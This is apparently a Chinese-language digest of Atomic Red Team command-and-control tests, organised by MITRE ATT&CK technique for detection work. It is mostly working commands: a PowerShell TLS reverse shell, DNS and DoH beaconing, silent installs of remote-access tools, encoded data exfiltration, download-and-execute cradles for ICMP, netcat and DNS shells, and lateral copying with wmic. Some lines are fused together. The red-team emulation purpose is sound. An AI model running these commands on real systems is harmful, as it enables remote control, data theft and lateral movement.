Atomic-命令与控制战术
Atomic-命令与控制战术
- 可以编入使用落实到安全策略且有效的战术编号
- 参考:
- https://atomicredteam.io/atomics/#command-and-control
具体战术概览
command-and-control
T1573
Encrypted Channel 加密通道
T1572
Protocol Tunneling 协议隧道
T1571
Non-Standard Port 非标准端口
T1219
Remote Access Software 远程访问软件
T1132.001
Data Encoding: Standard Encoding 数据编码:标准编码
T1105
Ingress Tool Transfer 入口工具传输
T1095
Non-Application Layer Protocol 非应用层协议
T1090.003
Proxy: Multi-hop Proxy 代理:多跳代理
T1090.001
Proxy: Internal Proxy 代理:内部代理
T1071.004
Application Layer Protocol: DNS 应用层协议:DNS
T1071.001
Application Layer Protocol: Web Protocols 应用层协议:Web协议
主机模型-加密通道
1. 使用 Openssl 建立 C2
C2 : Command and Control (C2)
$server_ip = 127.0.0.1
$server_port = 443
$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '#{server_port}')
$stream = $socket.GetStream()
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient('fakedomain.example', $null, "Tls12", $false)
$writer = new-object System.IO.StreamWriter($sslStream)
$writer.Write('PS ' + (pwd).Path + '> ')
$writer.flush()
[byte[]]$bytes = 0..65535|%{0};
while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)
{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data | Out-String ) 2>&1;
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}sc.exe create artservice binPath= "%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt"
https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926
https://gist.githubusercontent.com/clr2of8/4786587885a7debc576ab44a32fa5cb7/raw/af5827f3169920035da73bc17bc5ec8465b41c59/c2_client_to_openssl_server.ps1
主机模型-协议隧道
1. 通过DNS over HTTPS 进行大量查询
for($i=0; $i -le 1000; $i++) { (Invoke-WebRequest \""https://8.8.8.8/resolve?name=atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io&type=TXT\"" -UseBasicParsing).Content
2. 通过 DNS over HTTPS 进行常规信标
常规信标:该测试模拟受感染的主机通过 DoH 查询向命令和控制服务器定期发送信标。这种行为对于处于空闲状态等待指令或配置为随着时间的推移使用低查询量来逃避基于阈值的检测的植入物来说是典型的。
Set-Location C:\AtomicRedTeam\atomics .\T1572\src\T1572-doh-beacon.ps1 -DohServer https://8.8.8.8/resolve -Domain 127.0.0.1.xip.io -Subdomain atomicredteam -QueryType TXT -C2Interval 30 -C2Jitter 20 -RunTime 30
3. 通过 DNS over HTTPS 进行长域名查询
Set-Location C:\AtomicRedTeam\atomics .\T1572\src\T1572-doh-domain-length.ps1 -DohServer https://8.8.8.8/resolve -Domain 127.0.0.1.xip.io -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType TXT
主机模型-非标准端口
1. 使用 Powershell 测试非标准端口使用情况
Test-NetConnection -ComputerName google.com -port 8081
2. 使用 telnet 测试非标准端口使用情况
echo quit | telnet google.com 8081
exit 0
主机模型-远程访问软件
1. 在 Windows 上检测 TeamViewer 软件
Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\TeamViewer_Setup.exe https://download.teamviewer.com/download/TeamViewer_Setup.exe
$file1 = "C:\Users\" + $env:username + "\Desktop\TeamViewer_Setup.exe"
Start-Process -Wait $file1 /S;
Start-Process 'C:\Program Files (x86)\TeamViewer\TeamViewer.exe'
2. 在 Windows 上检测 Anydesk 软件
Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\AnyDesk.exe https://download.anydesk.com/AnyDesk.exe
$file1 = "C:\Users\" + $env:username + "\Desktop\AnyDesk.exe"
Start-Process $file1 /S;
3. 在 Windows 上检测 LogMeIn 软件
Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\LogMeInIgnition.msi https://secure.logmein.com/LogMeInIgnition.msi
$file1 = "C:\Users\" + $env:username + "\Desktop\LogMeInIgnition.msi"
Start-Process -Wait $file1 /quiet;
Start-Process 'C:\Program Files (x86)\LogMeIn Ignition\LMIIgnition.exe' "/S"
4. 在 Windows 上安装 GoToAssist 软件
Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1"
$file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe"
Start-Process $file1 /S;
5. 在 Windows 上安装 ScreenConnect 软件
$installer = "C:\Users\$env:username\Downloads\ScreenConnect.msi"
Invoke-WebRequest -OutFile $installer "https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.11.4237.7885_Release.msi"
msiexec /i $installer /qn
6. 在 Windows 上安装 Ammyy Admin 软件
Start-Process $env:temp\ammyy.exe
7. 在 Windows 上安装 RemotePC 软件
Start-Process $env:temp\RemotePC.exe
8. 在 Windows 上安装 NetSupport 远程访问木马(RAT)软件
Start-Process $env:temp\T1219_NetSupport.exe -ArgumentList "/S /v/qn"
9. 在 Windows 上安装 UltraViewer 软件
Start-Process -Wait -FilePath "$env:temp\T1219_UltraViewer.exe" -Argument "/silent" -PassThru
Start-Process 'C:\Program Files (x86)\UltraViewer\UltraViewer_Desktop.exe'
10. 在 Windows 上安装 UltraVNC 软件
Start-Process $env:ProgramFiles\'uvnc bvba\UltraVnc\vncviewer.exe'
11. 在 Windows 上安装 MSP360 软件
Start-Process $env:ProgramFiles\Connect\Connect.exe
主机模型-数据编码-标准编码
1. 使用 Base64 编码数据
echo -n 111-11-1111 | base64
curl -XPOST MTExLTExLTExMTE=.redcanary.com
2. 使用 XOR 编码数据
$plaintext = ([system.Text.Encoding]::UTF8.getBytes(\""Path\n----\nC:\Users\victim\"")) $key = \""abcdefghijklmnopqrstuvwxyz123456\"" $cyphertext = @(); for ($i = 0; $i -lt $plaintext.Count; $i++) { $cyphertext += $plaintext[$i] -bxor $key[$i %% $key.Length]; } $cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext) [System.Net.ServicePointManager]::Expect100Continue = $false Invoke-WebRequest -Uri example.com -Method POST -Body $cyphertext -DisableKeepAlive
主机模型-入口工具传输
-
Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe
-
Atomic Test #20 - Download a file with Microsoft Connection Manager Auto-Download
-
Atomic Test #22 - Printer Migration Command-Line Tool UNC share folder into a zip file
入口工具传输:可以理解为恶意攻击者想将一些带上传,下载,复制,移动,反弹功能的各种类似工具传入到目标受害的主机上,以达到进入目标主机的入口所使用的工具,我们成为入口工具传输。
具体测试用例看下面链接:
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md
提取常用的入口工具特征
rsync scp sftp
(certutil -urlcache)
(certutil -verifyctl)
(bitsadmin.exe /transfer)
(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}")
cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path}
timeout --preserve-status 1 whois -h localhost -p 443 "Hello from Atomic Red Team test T1105" > /tmp/T1105.whois.out
(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}
finger base64_filedata@#{remote_host}
$imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
& $imewdbled #{remote_url}
下载
curl -k url -o c:\users\public\music\allthethingsx64.dll
curl -k url --output c:\users\public\music\allthethingsx64.dll
curl -k url -o c:\programdata\allthethingsx64.dll
curl -k url -o %Temp%\allthethingsx64.dll
上传
curl -T c:\temp\atomictestfile.txt www.example.com
curl --upload-file c:\temp\atomictestfile.txt www.example.com
curl -d c:\temp\atomictestfile.txt www.example.com
curl --data c:\temp\atomictestfile.txt www.example.com
https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.bat
$machine_list = "$env:temp\T1105MachineList.txt"
$offline_list = "$env:temp\T1105OfflineHosts.txt"
$completed_list = "$env:temp\T1105CompletedHosts.txt"
foreach ($machine in get-content -path "$machine_list")
{if (test-connection -Count 1 -computername $machine -quiet)
{cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}"
echo $machine >> "$completed_list"
wmic /node: "$machine" process call create "regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}"}
else
{echo $machine >> "$offline_list"}}
replace.exe
certreq.exe -Post -config https://example.com c:\windows\win.ini %temp%\Atomic-license.txt
wscript.exe PathToAtomicsFolder\T1105\src\T1105-download-file.vbs
curl -sO https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh; chmod +x atomic.sh
| bash atomic.sh
nimgrab.exe
powershell.exe iwr -URI https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -Outfile %temp%\Atomic-license.txt
主机模型-非应用层协议
1. ICMP C2
IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')
Invoke-PowerShellIcmp -IPAddress 127.0.0.1
2. Netcat C2
cmd /c $env:TEMP\T1095\nmap-7.80\ncat.exe 127.0.0.1 80
3. Powercat C2
IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')
powercat -c 127.0.0.1 -p 80
主机模型-代理-多跳代理
1. Psiphon
PathToAtomicsFolder\T1090.003\src\Psiphon.bat
特征:psiphon3.exe
https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat
2. Tor Proxy Usage - Windows
invoke-expression 'cmd /c start powershell -Command {cmd /c $env:temp\tor\Tor\tor.exe}'
sleep -s 60
stop-process -name "tor" | out-null
https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip
3. Tor Proxy Usage - Debian/Ubuntu
sudo systemctl start tor
sudo apt-get -y install tor
4. Tor Proxy Usage - MacOS
osascript -e 'tell application "Terminal" to do script "tor"'
if [ ! -x "$(command -v brew --version)" ]; then /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh keystroke return)"; fi
brew install tor
主机模型-代理-内部代理
1. Connection Proxy
export http_proxy=127.0.0.1:8080
unset http_proxy
unset https_proxy
2. Connection Proxy for macOS UI
networksetup -setwebproxy Wi-Fi 127.0.0.1 8080
networksetup -setsecurewebproxy Wi-Fi 127.0.0.1 8080
networksetup -setwebproxystate Wi-Fi off
networksetup -setsecurewebproxystate Wi-Fi off
3. portproxy reg key
netsh interface portproxy add v4tov4 listenport=1337 connectport=1337 connectaddress=127.0.0.1
netsh interface portproxy delete v4tov4 listenport=1337 -ErrorAction Ignore | Out-Null
主机模型-应用层协议-DNS
1. 大量的 DNS 查询
for($i=0; $i -le 1000; $i++) { Resolve-DnsName -type \""TXT\"" \""atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io\"" -QuickTimeout}
2. DNS 常规信标
Set-Location C:\AtomicRedTeam\atomics .\T1071.004\src\T1071-dns-beacon.ps1 -Domain 127.0.0.1.xip.io -Subdomain atomicredteam -QueryType TXT -C2Interval 30 -C2Jitter 20 -RunTime 30
3. DNS 长域名查询
Set-Location C:\AtomicRedTeam\atomics .\T1071.004\src\T1071-dns-domain-length.ps1 -Domain 127.0.0.1.xip.io -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType TXT
4. DNS C2
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
Start-Dnscat2 -Domain example.com -DNSServer 127.0.0.1
主机模型-应用层协议-Web 协议
1. 使用 Powershell 执行恶意的User-Agent
Invoke-WebRequest www.google.com -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest www.google.com -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest www.google.com -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
Invoke-WebRequest www.google.com -UserAgent "*<|>*" | out-null
2. 使用 CMD 执行恶意的User-Agent
curl -s -A "HttpBrowser/1.0" -m3 www.google.com >nul 2>&1
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com >nul 2>&1
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com >nul 2>&1
curl -s -A "*<|>*" -m3 www.google.com >nul 2>&1
3. Linux 环境下执行恶意的User-Agent
curl -s -A "HttpBrowser/1.0" -m3 www.google.com
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com
curl -s -A "*<|>*" -m3 www.google.com